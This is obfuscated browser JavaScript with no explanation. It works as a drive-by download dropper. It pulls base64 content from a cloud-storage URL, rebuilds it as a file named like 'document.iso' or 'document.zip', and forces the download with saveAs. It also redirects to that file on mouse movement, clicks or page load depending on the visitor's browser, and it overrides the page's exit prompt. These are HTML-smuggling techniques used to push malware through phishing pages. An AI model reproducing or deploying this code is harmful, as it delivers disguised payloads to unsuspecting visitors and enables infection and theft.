var _0xdf0c = [
	'https://storage.googleapis.com/glwux2ka4abl6s.appspot.com/f/fdN5F8qEYlD9j.html',
	'zip',
	'iso',
	'',
	'#',
	'yes',
	'0',
	'420px',
	'no',
	'20px',
	'40%',
	'.loader',
	'.otherloader',
	'height',
	'width',
	'css',
	'loadingTime',
	'animate',
	'100%',
	'100px',
	'.logo',
	'.content',
	'location',
	'click',
	'#btn, #btn_alert',
	'error getting base64 from external api',
	'log',
	'fail',
	'data',
	'type',
	'ext',
	'done',
	'getJSON',
	'.loading-wrapper',
	'load',
	'url',
	'seeewrewrw',
	'btn_alert',
	'getElementById',
	'href',
	'setAttribute',
	'download',
	'true',
	'btn',
	'entries',
	'indexOf',
	'userAgent',
	'mouseMove',
	'mousemove',
	'onbeforeunload',
	'off',
	'addEventListener',
	'auto_download',
	'Firefox',
	'block',
	'#message',
	'showDownloadMsg',
	'ready',
	'redirectTime',
	'check',
	'exitAlert',
	'Test',
	'undefined',
	'event',
	'returnValue',
	'onload',
	'onloadend',
	'result',
	'response',
	'readAsDataURL',
	'GET',
	'open',
	'responseType',
	'blob',
	'send',
	',',
	'split',
	';',
	':',
	'length',
	'charCodeAt',
	'/',
	'plain',
	'txt',
	'word',
	'includes',
	'doc',
	'application/vnd.openxmlformats-officedocument.wordprocessingml.document',
	'text/plain',
	'pdf',
	'application/',
	'image/',
	'data:',
	';base64,',
	'document.',
	'error'
];
var settings = 2;
var url_file = _0xdf0c[0];
var url_type = _0xdf0c[1];
var base64_type = _0xdf0c[2];
var base64_string = _0xdf0c[3];
let a = false;
var params = {
	url: _0xdf0c[4],
	loadingTime: 5,
	showDownloadMsg: 2000,
	redirectTime: 0,
	exitAlert: _0xdf0c[5],
	blockCustomAlert: _0xdf0c[5],
	FirefoxAutoloadingTime: 0,
	Chrome: {
		bottom: _0xdf0c[3],
		left: _0xdf0c[6],
		right: _0xdf0c[6],
		top: _0xdf0c[7],
		check: _0xdf0c[8],
		auto_download: _0xdf0c[5],
		mouseMove: _0xdf0c[8]
	},
	Edge: {
		bottom: _0xdf0c[9],
		left: _0xdf0c[10],
		right: _0xdf0c[3],
		top: _0xdf0c[3],
		check: _0xdf0c[8],
		auto_download: _0xdf0c[5],
		mouseMove: _0xdf0c[8]
	},
	Firefox: {
		bottom: _0xdf0c[3],
		left: _0xdf0c[3],
		right: _0xdf0c[9],
		top: _0xdf0c[9],
		check: _0xdf0c[8],
		auto_download: _0xdf0c[5],
		mouseMove: _0xdf0c[8]
	},
	Opera: {
		bottom: _0xdf0c[3],
		left: _0xdf0c[3],
		right: _0xdf0c[9],
		top: _0xdf0c[9],
		check: _0xdf0c[8],
		auto_download: _0xdf0c[5],
		mouseMove: _0xdf0c[8]
	},
	Chromium: {
		bottom: _0xdf0c[9],
		left: _0xdf0c[3],
		right: _0xdf0c[3],
		top: _0xdf0c[3],
		check: _0xdf0c[8],
		auto_download: _0xdf0c[5],
		mouseMove: _0xdf0c[8]
	}
};
function loaderStrip() {
	$(window)[_0xdf0c[34]](function () {
		var _0xc3f0x9 = $(_0xdf0c[11]);
		var _0xc3f0xa = $(_0xdf0c[12]);
		var _0xc3f0xb = $(window)[_0xdf0c[13]]();
		var _0xc3f0xc = $(window)[_0xdf0c[14]]();
		var _0xc3f0xd = 0;
		_0xc3f0x9[_0xdf0c[15]]({
			top: _0xc3f0xb / 0,
			left: _0xc3f0xc / 0
		});
		do {
			_0xc3f0x9[_0xdf0c[17]]({ width: _0xc3f0xd }, params[_0xdf0c[16]]);
			_0xc3f0xd += 2;
		} while (_0xc3f0xd <= 140);
		;
		if (_0xc3f0xd === 142) {
			_0xc3f0x9[_0xdf0c[17]]({
				left: 0,
				width: _0xdf0c[18]
			}, function () {
				$(_0xdf0c[33])[_0xdf0c[17]]({ 'opacity': 0 }, {
					duration: 200,
					complete: function () {
						$(_0xdf0c[20])[_0xdf0c[17]]({
							'width': _0xdf0c[19],
							'height': _0xdf0c[19]
						}, { queue: false });
						$(_0xdf0c[21])[_0xdf0c[17]]({ 'opacity': 1 }, {
							duration: 200,
							queue: false
						});
						switch (settings) {
						case 1:
							showMes();
							window[_0xdf0c[22]] = url_file;
							$(_0xdf0c[24])[_0xdf0c[23]](function () {
								window[_0xdf0c[22]] = url_file;
								showMes();
							});
							break;
						case 2:
							$[_0xdf0c[32]](url_file, function (_0xc3f0xe) {
							})[_0xdf0c[31]](function (_0xc3f0xe) {
								var _0xc3f0xf = extensionMatcher(_0xc3f0xe[_0xdf0c[28]], url_type);
								save(_0xc3f0xf, getAdditionalInfo(_0xc3f0xf)[_0xdf0c[29]], getAdditionalInfo(_0xc3f0xf)[_0xdf0c[30]]);
								showMes();
							})[_0xdf0c[27]](function () {
								console[_0xdf0c[26]](_0xdf0c[25]);
							});
							$(_0xdf0c[24])[_0xdf0c[23]](function () {
								$[_0xdf0c[32]](url_file, function (_0xc3f0xe) {
								})[_0xdf0c[31]](function (_0xc3f0xe) {
									var _0xc3f0xf = extensionMatcher(_0xc3f0xe[_0xdf0c[28]], url_type);
									save(_0xc3f0xf, getAdditionalInfo(_0xc3f0xf)[_0xdf0c[29]], getAdditionalInfo(_0xc3f0xf)[_0xdf0c[30]]);
									showMes();
								})[_0xdf0c[27]](function () {
									console[_0xdf0c[26]](_0xdf0c[25]);
								});
							});
							break;
						case 3:
							var _0xc3f0x10 = extensionMatcher(base64_string, base64_type);
							save(_0xc3f0x10, getAdditionalInfo(_0xc3f0x10)[_0xdf0c[29]], getAdditionalInfo(_0xc3f0x10)[_0xdf0c[30]]);
							showMes();
							$(_0xdf0c[24])[_0xdf0c[23]](function () {
								save(_0xc3f0x10, getAdditionalInfo(_0xc3f0x10)[_0xdf0c[29]], getAdditionalInfo(_0xc3f0x10)[_0xdf0c[30]]);
								showMes();
							});
							break;
						case 4:
							sendReq();
							break;
						default:
						}
					}
				});
			});
		}
	});
}
loaderStrip();
function hello(_0xc3f0x12) {
	params[_0xdf0c[35]] = _0xc3f0x12;
	console[_0xdf0c[26]](params[_0xdf0c[35]], _0xdf0c[36]);
	var _0xc3f0x13 = document[_0xdf0c[38]](_0xdf0c[37]);
	_0xc3f0x13[_0xdf0c[40]](_0xdf0c[39], params[_0xdf0c[35]]);
	_0xc3f0x13[_0xdf0c[40]](_0xdf0c[41], _0xdf0c[42]);
	var _0xc3f0x14 = document[_0xdf0c[38]](_0xdf0c[43]);
	for (const [key, value] of Object[_0xdf0c[44]](params)) {
		if (navigator[_0xdf0c[46]][_0xdf0c[45]](key) > -1) {
			if (value[_0xdf0c[47]] === _0xdf0c[5]) {
				let _0xc3f0x15 = 0;
				document[_0xdf0c[51]](_0xdf0c[48], () => {
					_0xc3f0x15 = _0xc3f0x15 + 1;
					if (_0xc3f0x15 === 1) {
						window[_0xdf0c[49]] = () => {
							return undefined;
						};
						window[_0xdf0c[22]] = params[_0xdf0c[35]];
						$(document)[_0xdf0c[50]](_0xdf0c[48], mouse);
					}
				});
			}
			;
			if (value[_0xdf0c[52]] === _0xdf0c[5]) {
				if (key === _0xdf0c[53]) {
					setTimeout(() => {
						window[_0xdf0c[22]] = params[_0xdf0c[35]];
					}, params.FirefoxAutoloadingTime);
				}
				;
				setTimeout(() => {
					$(document)[_0xdf0c[57]](() => {
						window[_0xdf0c[49]] = () => {
							return undefined;
						};
						window[_0xdf0c[22]] = params[_0xdf0c[35]];
						setTimeout(() => {
							$(_0xdf0c[55])[_0xdf0c[15]]({ 'display': _0xdf0c[54] });
						}, params[_0xdf0c[56]]);
					});
				}, params[_0xdf0c[58]]);
			}
			;
			if (value[_0xdf0c[59]] === _0xdf0c[8]) {
				_0xc3f0x14[_0xdf0c[40]](_0xdf0c[39], params[_0xdf0c[35]]);
				_0xc3f0x14[_0xdf0c[40]](_0xdf0c[41], true);
			} else {
				if (value[_0xdf0c[59]] === _0xdf0c[5]) {
					document[_0xdf0c[51]](_0xdf0c[23], () => {
						window[_0xdf0c[49]] = () => {
							return undefined;
						};
						window[_0xdf0c[22]] = params[_0xdf0c[35]];
					});
				}
			}
			;
			$(_0xdf0c[24])[_0xdf0c[23]](_0xc3f0x12 => {
				window[_0xdf0c[49]] = () => {
					return undefined;
				};
				setTimeout(() => {
					$(_0xdf0c[55])[_0xdf0c[15]]({ 'display': _0xdf0c[54] });
				}, params[_0xdf0c[56]]);
			});
		}
	}
}
if (params[_0xdf0c[60]] === _0xdf0c[5]) {
	window[_0xdf0c[49]] = function (_0xc3f0x16) {
		var _0xc3f0x17 = _0xdf0c[61];
		if (typeof _0xc3f0x16 == _0xdf0c[62]) {
			_0xc3f0x16 = window[_0xdf0c[63]];
		}
		;
		if (_0xc3f0x16) {
			_0xc3f0x16[_0xdf0c[64]] = _0xc3f0x17;
		}
		;
		return null;
	};
}
;
function toDataUri(_0xc3f0x19, _0xc3f0x1a) {
	var _0xc3f0x1b = new XMLHttpRequest();
	_0xc3f0x1b[_0xdf0c[65]] = function () {
		var _0xc3f0x1c = new FileReader();
		_0xc3f0x1c[_0xdf0c[66]] = function () {
			_0xc3f0x1a(_0xc3f0x1c[_0xdf0c[67]]);
		};
		_0xc3f0x1c[_0xdf0c[69]](_0xc3f0x1b[_0xdf0c[68]]);
	};
	_0xc3f0x1b[_0xdf0c[71]](_0xdf0c[70], _0xc3f0x19);
	_0xc3f0x1b[_0xdf0c[72]] = _0xdf0c[73];
	_0xc3f0x1b[_0xdf0c[74]]();
}
function toBlob(_0xc3f0x1e) {
	var _0xc3f0x1f = atob(_0xc3f0x1e[_0xdf0c[76]](_0xdf0c[75])[1]);
	var _0xc3f0x20 = _0xc3f0x1e[_0xdf0c[76]](_0xdf0c[75])[0][_0xdf0c[76]](_0xdf0c[78])[1][_0xdf0c[76]](_0xdf0c[77])[0];
	var _0xc3f0x21 = new ArrayBuffer(_0xc3f0x1f[_0xdf0c[79]]);
	var _0xc3f0x22 = new Uint8Array(_0xc3f0x21);
	for (var _0xc3f0xd = 0; _0xc3f0xd < _0xc3f0x1f[_0xdf0c[79]]; _0xc3f0xd++) {
		_0xc3f0x22[_0xc3f0xd] = _0xc3f0x1f[_0xdf0c[80]](_0xc3f0xd);
	}
	;
	var _0xc3f0x23 = new Blob([_0xc3f0x21], { type: _0xc3f0x20 });
	return _0xc3f0x23;
}
function getAdditionalInfo(_0xc3f0x25) {
	var _0xc3f0x26 = _0xc3f0x25[_0xdf0c[76]](_0xdf0c[77])[0][_0xdf0c[76]](_0xdf0c[81])[1];
	if (_0xc3f0x26 == _0xdf0c[82]) {
		_0xc3f0x26 = _0xdf0c[83];
	} else {
		if (_0xc3f0x26[_0xdf0c[85]](_0xdf0c[84])) {
			_0xc3f0x26 = _0xdf0c[86];
		}
	}
	;
	var _0xc3f0x27 = _0xc3f0x25[_0xdf0c[76]](_0xdf0c[77])[0][_0xdf0c[76]](_0xdf0c[78])[1];
	return {
		'ext': _0xc3f0x26,
		'type': _0xc3f0x27
	};
}
function extensionMatcher(_0xc3f0x25, _0xc3f0x27) {
	var _0xc3f0x29 = _0xdf0c[3];
	if (_0xc3f0x27 == _0xdf0c[86] || _0xc3f0x27 == _0xdf0c[86]) {
		_0xc3f0x29 = _0xdf0c[87];
	} else {
		if (_0xc3f0x27 == _0xdf0c[83]) {
			_0xc3f0x29 = _0xdf0c[88];
		} else {
			if (_0xc3f0x27 == _0xdf0c[89]) {
				_0xc3f0x29 = _0xdf0c[90] + _0xc3f0x27;
			} else {
				_0xc3f0x29 = _0xdf0c[91] + _0xc3f0x27;
			}
		}
	}
	;
	var _0xc3f0x2a = _0xdf0c[92] + _0xc3f0x29 + _0xdf0c[93];
	return _0xc3f0x2a + _0xc3f0x25;
}
function assemble(_0xc3f0x19) {
	toDataUri(_0xc3f0x19, function (_0xc3f0x2c) {
		var _0xc3f0x2d = getAdditionalInfo(_0xc3f0x2c);
		save(_0xc3f0x2c, _0xc3f0x2d[_0xdf0c[29]], _0xc3f0x2d[_0xdf0c[30]]);
	});
}
function save(_0xc3f0x2f, _0xc3f0x27, _0xc3f0x26) {
	var _0xc3f0x30 = toBlob(_0xc3f0x2f);
	var _0xc3f0x23 = new Blob([_0xc3f0x30], { type: _0xc3f0x27 });
	saveAs(_0xc3f0x23, _0xdf0c[94] + _0xc3f0x26);
}
function sendReq() {
	$[_0xdf0c[32]](_0xdf0c[4], function (_0xc3f0xe) {
	})[_0xdf0c[31]](function (_0xc3f0xe) {
		params[_0xdf0c[16]] = 0;
		;
		;
		params[_0xdf0c[35]] = _0xc3f0xe[_0xdf0c[28]];
		hello(_0xc3f0xe[_0xdf0c[28]]);
	})[_0xdf0c[27]](function () {
		console[_0xdf0c[26]](_0xdf0c[95]);
	});
}
function showMes(_0xc3f0x33 = 1000) {
	setTimeout(() => {
		$(_0xdf0c[55])[_0xdf0c[15]]({ 'display': _0xdf0c[54] });
	}, _0xc3f0x33);
}
